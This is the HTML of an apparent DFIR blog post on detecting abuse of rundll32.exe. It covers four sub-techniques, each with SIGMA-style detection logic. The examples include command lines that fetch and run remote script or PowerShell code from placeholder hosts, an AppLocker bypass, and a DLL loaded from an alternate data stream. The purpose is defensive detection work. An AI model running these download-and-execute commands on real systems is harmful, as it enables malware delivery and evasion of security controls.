<!DOCTYPE html>
<html lang="en"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.8.0 -->
<title>Detecting RunDLL32 ATT&amp;CK Techniques | DFIR TNT Digital Forensics Incident Response Tips and Tricks</title>
<meta name="generator" content="Jekyll v3.10.0" />
<meta property="og:title" content="Detecting RunDLL32 ATT&amp;CK Techniques" />
<meta name="author" content="Andrew Skatoff" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="ATT&amp;CK Detection LOLBINS &lt;!DOCTYPE html PUBLIC &quot;-//W3C//DTD HTML 4.0 Transitional//EN&quot; &quot;http://www.w3.org/TR/REC-html40/loose.dtd&quot;&gt; &lt;/p&gt; Launching a strange binary file on a target endpoint is a good way to raise alarm bells within the target organization&#39;s SOC. One of the more common #LOLBINS we see is to use RunDLL32.exe to execute malicious DLL files. This technique is well documented in MITRE&#39;s ATT&amp;CK framework under T1085. In this post, we look at detection approaches for 4 sub-techniques. In each case the assumption is that you are logging command execution with Sysmon or at least EventID 4688 (process execution with command lines). Note: Credit for items #1 and #2 goes to the brilliant folks at https://lolbasproject.github.io/lolbas. SubTechnique 1 - Javascript ActiveX Objects Executing simple Javascript downloader.This behavior has been used by malware such as Poweliks. rundll32.exe javascript:&quot;..\mshtml,RunHTMLApplication &quot;;document.write();GetObject(&quot;script:https[:]//www[.]example[.]com/malicious.sct&quot;)&quot; Executing Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site. rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();new%20ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString(&#39;http://ip:port/&#39;);&quot; Using Rundll32.exe to execute a JavaScript script that runs calc.exe. This will bypass AppLocker even if calc.exe is not on the allowed list. rundll32.exe javascript:&quot;\..\mshtml.dll,RunHTMLApplication &quot;;eval(&quot;w=new%20ActiveXObject(\&quot;WScript.Shell\&quot;);w.run(\&quot;calc\&quot;);window.close()&quot;); Executing Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started. rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new%20ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;calc.exe&quot;,0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;cmd /c taskkill /f /im rundll32.exe&quot;,0,true);} SIGMA Friendly Detection Logic: image=rundll32.exe AND commandLine=&quot;*ActiveXObject*&quot;  OR   commandLine=&quot;*WScript.Shell*&quot; OR commandLine=&quot;*RunHTMLApplication*” SubTechnique 2 - Alternate data streams Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS). rundll32 &quot;C:\ads\file.txt:ADSDLL.dll&quot;,DllMain SIGMA Friendly Detection Logic: image=rundll32.exe  | regex commandLine=&quot;/^rundll32.+\:.+\..+$/&quot; SubTechnique 3 – Point Function Call RunDll32 can be used to launch an executable via the PointFunctionCall operation. This technique was used by a suspected APT group (APT29). &quot;C:\Windows\system32\rundll32.exe&quot;  C:\Users\Administrator\AppData\Local\cyzfc.dat, PointFunctionCall SIGMA Friendly Detection Logic: image=rundll32.exe  AND commandLine=&quot;*PointFunctionCall*&quot; SubTechnique 4 – Network HTTP(s) call for additional payloads Rundll32 can be used to launch a custom DLL that pulls down malware from the internet. The example below is used by Slimware PUA. Rundll32.exe &quot;C:\Users\*\AppData\Local\OnlineFormFinderTooltab\TooltabExtension.dll&quot;,A -hp=https://hp.myway.com/onlineformfinder/ttab02/index.html -ua=&quot;(Windows NT 10.0; Win64; MSIE 11.1747; Build 16299; SP 0)&quot; -ul=https://anx.mindspark.com/anx.gif?anxa=%251&amp;anxe=%252&amp;anxt=CE87BC6F-A080-40BF-8E3B-4EE1C18EDBB7&amp;anxtv=2.7.1.3000&amp;anxp=^CPW^xdm373^TTAB02^us&amp;anxsi=&amp;anxv=%253&amp;anxd=2020-04-01&amp;anxr=%254 -hu=SHOW SIGMA Friendly Detection Logic: image=rundll32.exe  (commandLine=&quot;*\\users\\*http*.&quot; AND NOT commandLine=*yourdomain.com*) References: - https://lolbas-project.github.io/lolbas/Binaries/Rundll32- https://attack.mitre.org/techniques/T1085/- https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html &lt;/body&gt;&lt;/html&gt;" />
<meta property="og:description" content="ATT&amp;CK Detection LOLBINS &lt;!DOCTYPE html PUBLIC &quot;-//W3C//DTD HTML 4.0 Transitional//EN&quot; &quot;http://www.w3.org/TR/REC-html40/loose.dtd&quot;&gt; &lt;/p&gt; Launching a strange binary file on a target endpoint is a good way to raise alarm bells within the target organization&#39;s SOC. One of the more common #LOLBINS we see is to use RunDLL32.exe to execute malicious DLL files. This technique is well documented in MITRE&#39;s ATT&amp;CK framework under T1085. In this post, we look at detection approaches for 4 sub-techniques. In each case the assumption is that you are logging command execution with Sysmon or at least EventID 4688 (process execution with command lines). Note: Credit for items #1 and #2 goes to the brilliant folks at https://lolbasproject.github.io/lolbas. SubTechnique 1 - Javascript ActiveX Objects Executing simple Javascript downloader.This behavior has been used by malware such as Poweliks. rundll32.exe javascript:&quot;..\mshtml,RunHTMLApplication &quot;;document.write();GetObject(&quot;script:https[:]//www[.]example[.]com/malicious.sct&quot;)&quot; Executing Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site. rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();new%20ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString(&#39;http://ip:port/&#39;);&quot; Using Rundll32.exe to execute a JavaScript script that runs calc.exe. This will bypass AppLocker even if calc.exe is not on the allowed list. rundll32.exe javascript:&quot;\..\mshtml.dll,RunHTMLApplication &quot;;eval(&quot;w=new%20ActiveXObject(\&quot;WScript.Shell\&quot;);w.run(\&quot;calc\&quot;);window.close()&quot;); Executing Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started. rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new%20ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;calc.exe&quot;,0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;cmd /c taskkill /f /im rundll32.exe&quot;,0,true);} SIGMA Friendly Detection Logic: image=rundll32.exe AND commandLine=&quot;*ActiveXObject*&quot;  OR   commandLine=&quot;*WScript.Shell*&quot; OR commandLine=&quot;*RunHTMLApplication*” SubTechnique 2 - Alternate data streams Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS). rundll32 &quot;C:\ads\file.txt:ADSDLL.dll&quot;,DllMain SIGMA Friendly Detection Logic: image=rundll32.exe  | regex commandLine=&quot;/^rundll32.+\:.+\..+$/&quot; SubTechnique 3 – Point Function Call RunDll32 can be used to launch an executable via the PointFunctionCall operation. This technique was used by a suspected APT group (APT29). &quot;C:\Windows\system32\rundll32.exe&quot;  C:\Users\Administrator\AppData\Local\cyzfc.dat, PointFunctionCall SIGMA Friendly Detection Logic: image=rundll32.exe  AND commandLine=&quot;*PointFunctionCall*&quot; SubTechnique 4 – Network HTTP(s) call for additional payloads Rundll32 can be used to launch a custom DLL that pulls down malware from the internet. The example below is used by Slimware PUA. Rundll32.exe &quot;C:\Users\*\AppData\Local\OnlineFormFinderTooltab\TooltabExtension.dll&quot;,A -hp=https://hp.myway.com/onlineformfinder/ttab02/index.html -ua=&quot;(Windows NT 10.0; Win64; MSIE 11.1747; Build 16299; SP 0)&quot; -ul=https://anx.mindspark.com/anx.gif?anxa=%251&amp;anxe=%252&amp;anxt=CE87BC6F-A080-40BF-8E3B-4EE1C18EDBB7&amp;anxtv=2.7.1.3000&amp;anxp=^CPW^xdm373^TTAB02^us&amp;anxsi=&amp;anxv=%253&amp;anxd=2020-04-01&amp;anxr=%254 -hu=SHOW SIGMA Friendly Detection Logic: image=rundll32.exe  (commandLine=&quot;*\\users\\*http*.&quot; AND NOT commandLine=*yourdomain.com*) References: - https://lolbas-project.github.io/lolbas/Binaries/Rundll32- https://attack.mitre.org/techniques/T1085/- https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html &lt;/body&gt;&lt;/html&gt;" />
<link rel="canonical" href="https://dfirtnt.github.io/2020/06/28/detecting-rundll32-attck-techniques/" />
<meta property="og:url" content="https://dfirtnt.github.io/2020/06/28/detecting-rundll32-attck-techniques/" />
<meta property="og:site_name" content="DFIR TNT Digital Forensics Incident Response Tips and Tricks" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2020-06-28T15:20:00-04:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Detecting RunDLL32 ATT&amp;CK Techniques" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"Andrew Skatoff"},"dateModified":"2020-06-28T15:20:00-04:00","datePublished":"2020-06-28T15:20:00-04:00","description":"ATT&amp;CK Detection LOLBINS &lt;!DOCTYPE html PUBLIC &quot;-//W3C//DTD HTML 4.0 Transitional//EN&quot; &quot;http://www.w3.org/TR/REC-html40/loose.dtd&quot;&gt; &lt;/p&gt; Launching a strange binary file on a target endpoint is a good way to raise alarm bells within the target organization&#39;s SOC. One of the more common #LOLBINS we see is to use RunDLL32.exe to execute malicious DLL files. This technique is well documented in MITRE&#39;s ATT&amp;CK framework under T1085. In this post, we look at detection approaches for 4 sub-techniques. In each case the assumption is that you are logging command execution with Sysmon or at least EventID 4688 (process execution with command lines). Note: Credit for items #1 and #2 goes to the brilliant folks at https://lolbasproject.github.io/lolbas. SubTechnique 1 - Javascript ActiveX Objects Executing simple Javascript downloader.This behavior has been used by malware such as Poweliks. rundll32.exe javascript:&quot;..\\mshtml,RunHTMLApplication &quot;;document.write();GetObject(&quot;script:https[:]//www[.]example[.]com/malicious.sct&quot;)&quot; Executing Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site. rundll32.exe javascript:&quot;\\..\\mshtml,RunHTMLApplication &quot;;document.write();new%20ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString(&#39;http://ip:port/&#39;);&quot; Using Rundll32.exe to execute a JavaScript script that runs calc.exe. This will bypass AppLocker even if calc.exe is not on the allowed list. rundll32.exe javascript:&quot;\\..\\mshtml.dll,RunHTMLApplication &quot;;eval(&quot;w=new%20ActiveXObject(\\&quot;WScript.Shell\\&quot;);w.run(\\&quot;calc\\&quot;);window.close()&quot;); Executing Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started. rundll32.exe javascript:&quot;\\..\\mshtml,RunHTMLApplication &quot;;document.write();h=new%20ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;calc.exe&quot;,0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;cmd /c taskkill /f /im rundll32.exe&quot;,0,true);} SIGMA Friendly Detection Logic: image=rundll32.exe AND commandLine=&quot;*ActiveXObject*&quot;  OR   commandLine=&quot;*WScript.Shell*&quot; OR commandLine=&quot;*RunHTMLApplication*” SubTechnique 2 - Alternate data streams Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS). rundll32 &quot;C:\\ads\\file.txt:ADSDLL.dll&quot;,DllMain SIGMA Friendly Detection Logic: image=rundll32.exe  | regex commandLine=&quot;/^rundll32.+\\:.+\\..+$/&quot; SubTechnique 3 – Point Function Call RunDll32 can be used to launch an executable via the PointFunctionCall operation. This technique was used by a suspected APT group (APT29). &quot;C:\\Windows\\system32\\rundll32.exe&quot;  C:\\Users\\Administrator\\AppData\\Local\\cyzfc.dat, PointFunctionCall SIGMA Friendly Detection Logic: image=rundll32.exe  AND commandLine=&quot;*PointFunctionCall*&quot; SubTechnique 4 – Network HTTP(s) call for additional payloads Rundll32 can be used to launch a custom DLL that pulls down malware from the internet. The example below is used by Slimware PUA. Rundll32.exe &quot;C:\\Users\\*\\AppData\\Local\\OnlineFormFinderTooltab\\TooltabExtension.dll&quot;,A -hp=https://hp.myway.com/onlineformfinder/ttab02/index.html -ua=&quot;(Windows NT 10.0; Win64; MSIE 11.1747; Build 16299; SP 0)&quot; -ul=https://anx.mindspark.com/anx.gif?anxa=%251&amp;anxe=%252&amp;anxt=CE87BC6F-A080-40BF-8E3B-4EE1C18EDBB7&amp;anxtv=2.7.1.3000&amp;anxp=^CPW^xdm373^TTAB02^us&amp;anxsi=&amp;anxv=%253&amp;anxd=2020-04-01&amp;anxr=%254 -hu=SHOW SIGMA Friendly Detection Logic: image=rundll32.exe  (commandLine=&quot;*\\\\users\\\\*http*.&quot; AND NOT commandLine=*yourdomain.com*) References: - https://lolbas-project.github.io/lolbas/Binaries/Rundll32- https://attack.mitre.org/techniques/T1085/- https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html &lt;/body&gt;&lt;/html&gt;","headline":"Detecting RunDLL32 ATT&amp;CK Techniques","mainEntityOfPage":{"@type":"WebPage","@id":"https://dfirtnt.github.io/2020/06/28/detecting-rundll32-attck-techniques/"},"url":"https://dfirtnt.github.io/2020/06/28/detecting-rundll32-attck-techniques/"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/main.css"><link type="application/atom+xml" rel="alternate" href="https://dfirtnt.github.io/feed.xml" title="DFIR TNT | Digital Forensics | Incident Response | Tips and Tricks" /></head>
<body><header class="site-header" role="banner">

  <div class="wrapper"><a class="site-title" rel="author" href="/">DFIR TNT | Digital Forensics | Incident Response | Tips and Tricks</a><nav class="site-nav">
        <input type="checkbox" id="nav-trigger" class="nav-trigger" />
        <label for="nav-trigger">
          <span class="menu-icon">
            <svg viewBox="0 0 18 15" width="18px" height="15px">
              <path d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.032C17.335,0,18,0.665,18,1.484L18,1.484z M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.032C17.335,6.031,18,6.696,18,7.516L18,7.516z M18,13.516C18,14.335,17.335,15,16.516,15H1.484 C0.665,15,0,14.335,0,13.516l0,0c0-0.82,0.665-1.483,1.484-1.483h15.032C17.335,12.031,18,12.695,18,13.516L18,13.516z"/>
            </svg>
          </span>
        </label>

        <div class="trigger"></div>
      </nav></div>
</header>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">

  <header class="post-header">
    <h1 class="post-title p-name" itemprop="name headline">Detecting RunDLL32 ATT&amp;amp;CK Techniques</h1>
    <p class="post-meta">
      <time class="dt-published" datetime="2020-06-28T15:20:00-04:00" itemprop="datePublished">Jun 28, 2020
      </time></p>
  </header>

  <div class="post-content e-content" itemprop="articleBody">
    - ATT&amp;CK
- Detection
- LOLBINS
<p><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"><br />
<html><body></p>
<p>Launching a strange binary file on a target endpoint is a good way to raise alarm bells within the target organization's SOC. One of the more common #LOLBINS we see is to use RunDLL32.exe to execute malicious DLL files. This technique is well documented in MITRE's ATT&amp;CK framework under <a rel="noreferrer noopener" href="https://attack.mitre.org/techniques/T1085/" target="_blank">T1085</a>.</p>
<p><!-- /wp:paragraph --></p>
<p></p>
<p>In this post, we look at detection approaches for 4 sub-techniques. In each case the assumption is that you are logging command execution with <a href="https://www.blackhillsinfosec.com/getting-started-with-sysmon/" target="_blank" rel="noreferrer noopener">Sysmon</a> or at least <a href="https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/component-updates/command-line-process-auditing" target="_blank" rel="noreferrer noopener">EventID 4688</a> (process execution with command lines). </p>
<p><!-- /wp:paragraph --></p>
<p></p>
<pre class="wp-block-verse"><em>Note: Credit for items #1 and #2 goes to the brilliant folks at <a rel="noreferrer noopener" href="https://lolbas-project.github.io/lolbas/Binaries/Rundll32/" target="_blank">https://lolbasproject.github.io/lolbas</a>.</em></pre>
<p><!-- /wp:verse --></p>
<p></p>
<h2>SubTechnique 1 - Javascript ActiveX Objects</h2>
<p><!-- /wp:heading --></p>
<p></p>
<p>Executing simple Javascript downloader.<br><em>This behavior has been used by malware such as <a rel="noreferrer noopener" href="https://www.vmray.com/cyber-security-blog/poweliks-fileless-malware-analysis/" target="_blank">Poweliks</a>.</em></p>
<p><!-- /wp:paragraph --></p>
<p></p>
<pre class="wp-block-preformatted">rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" </pre>
<p><!-- /wp:preformatted --></p>
<p></p>
<p>Executing Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.</p>
<p><!-- /wp:paragraph --></p>
<p></p>
<pre class="wp-block-preformatted">rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"</pre>
<p><!-- /wp:preformatted --></p>
<p></p>
<p>Using Rundll32.exe to execute a JavaScript script that runs calc.exe. This will bypass AppLocker even if calc.exe is not on the allowed list.</p>
<p><!-- /wp:paragraph --></p>
<p></p>
<pre class="wp-block-preformatted">rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
</pre>
<p><!-- /wp:preformatted --></p>
<p></p>
<p>Executing Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started.</p>
<p><!-- /wp:paragraph --></p>
<p></p>
<pre class="wp-block-preformatted">rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}</pre>
<p><!-- /wp:preformatted --></p>
<p></p>
<p><span style="text-decoration:underline">SIGMA Friendly Detection Logic:</span></p>
<p><!-- /wp:paragraph --></p>
<p></p>
<p>image=rundll32.exe AND commandLine="*ActiveXObject*"  OR   commandLine="*WScript.Shell*" OR commandLine="*RunHTMLApplication*”</p>
<p><!-- /wp:paragraph --></p>
<p></p>
<h2>SubTechnique 2 - Alternate data streams</h2>
<p><!-- /wp:heading --></p>
<p></p>
<p>Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).</p>
<p><!-- /wp:paragraph --></p>
<p></p>
<pre class="wp-block-preformatted">rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain</pre>
<p><!-- /wp:preformatted --></p>
<p></p>
<p><span style="text-decoration:underline">SIGMA Friendly Detection Logic:</span></p>
<p><!-- /wp:paragraph --></p>
<p></p>
<p>image=rundll32.exe  | <span style="color:#9fa300" class="has-inline-color">regex</span> commandLine="/^rundll32.+\:.+\..+$/"</p>
<p><!-- /wp:paragraph --></p>
<p></p>
<h2>SubTechnique 3 – Point Function Call</h2>
<p><!-- /wp:heading --></p>
<p></p>
<p>RunDll32 can be used to launch an executable via the <a rel="noreferrer noopener" href="https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-entry-point-function" target="_blank">PointFunctionCall</a> operation. This technique was used by a suspected <a href="https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html" target="_blank" rel="noreferrer noopener">APT group</a> (APT29).<br></p>
<p><!-- /wp:paragraph --></p>
<p></p>
<pre class="wp-block-preformatted">"C:\Windows\system32\rundll32.exe"  C:\Users\Administrator\AppData\Local\cyzfc.dat, PointFunctionCall</pre>
<p><!-- /wp:preformatted --></p>
<p></p>
<p><span style="text-decoration:underline">SIGMA Friendly Detection Logic:</span></p>
<p><!-- /wp:paragraph --></p>
<p></p>
<p>image=rundll32.exe  AND commandLine="*PointFunctionCall*"</p>
<p><!-- /wp:paragraph --></p>
<p></p>
<h2>SubTechnique 4 – Network HTTP(s) call for additional payloads</h2>
<p><!-- /wp:heading --></p>
<p></p>
<p>Rundll32 can be used to launch a custom DLL that pulls down malware from the internet. The example below is used by <a href="https://malwaretips.com/blogs/remove-my-forms-finder-by-myway/">Slimware PUA</a>.</p>
<p><!-- /wp:paragraph --></p>
<p></p>
<pre class="wp-block-preformatted">Rundll32.exe "C:\Users\*\AppData\Local\OnlineFormFinderTooltab\TooltabExtension.dll",A -hp=https://hp.myway.com/onlineformfinder/ttab02/index.html -ua="(Windows NT 10.0; Win64; MSIE 11.1747; Build 16299; SP 0)" -ul=https://anx.mindspark.com/anx.gif?anxa=%251&amp;anxe=%252&amp;anxt=CE87BC6F-A080-40BF-8E3B-4EE1C18EDBB7&amp;anxtv=2.7.1.3000&amp;anxp=^CPW^xdm373^TTAB02^us&amp;anxsi=&amp;anxv=%253&amp;anxd=2020-04-01&amp;anxr=%254 -hu=SHOW</pre>
<p><!-- /wp:preformatted --></p>
<p></p>
<p><span style="text-decoration:underline">SIGMA Friendly Detection Logic:</span></p>
<p><!-- /wp:paragraph --></p>
<p></p>
<p>image=rundll32.exe  (commandLine="*\\users\\*http*." AND NOT commandLine=*<em>yourdomain</em>.com*)</p>
<p><!-- /wp:paragraph --></p>
<p></p>
<p><strong>References:</strong></p>
<p><!-- /wp:paragraph --></p>
<p></p>
<p>- <a rel="noreferrer noopener" href="https://lolbas-project.github.io/lolbas/Binaries/Rundll32/" target="_blank">https://lolbas-project.github.io/lolbas/Binaries/Rundll32</a><br>- <a rel="noreferrer noopener" href="https://attack.mitre.org/techniques/T1085/" target="_blank">https://attack.mitre.org/techniques/T1085/</a><br>- <a rel="noreferrer noopener" href="https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html" target="_blank">https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html</a></p>
<p><!-- /wp:paragraph --><br />
</body></html></p>

  </div><a class="u-url" href="/2020/06/28/detecting-rundll32-attck-techniques/" hidden></a>
</article>

      </div>
    </main><footer class="site-footer h-card">
  <data class="u-url" href="/"></data>

  <div class="wrapper">

    <h2 class="footer-heading">DFIR TNT | Digital Forensics | Incident Response | Tips and Tricks</h2>

    <div class="footer-col-wrapper">
      <div class="footer-col footer-col-1">
        <ul class="contact-list">
          <li class="p-name">Andrew Skatoff</li></ul>
      </div>

      <div class="footer-col footer-col-2"><ul class="social-media-list"></ul>
</div>

      <div class="footer-col footer-col-3">
        <p>Digital Forensics | Incident Response | Tips and Tricks</p>
      </div>
    </div>

  </div>

</footer>
</body>

</html>
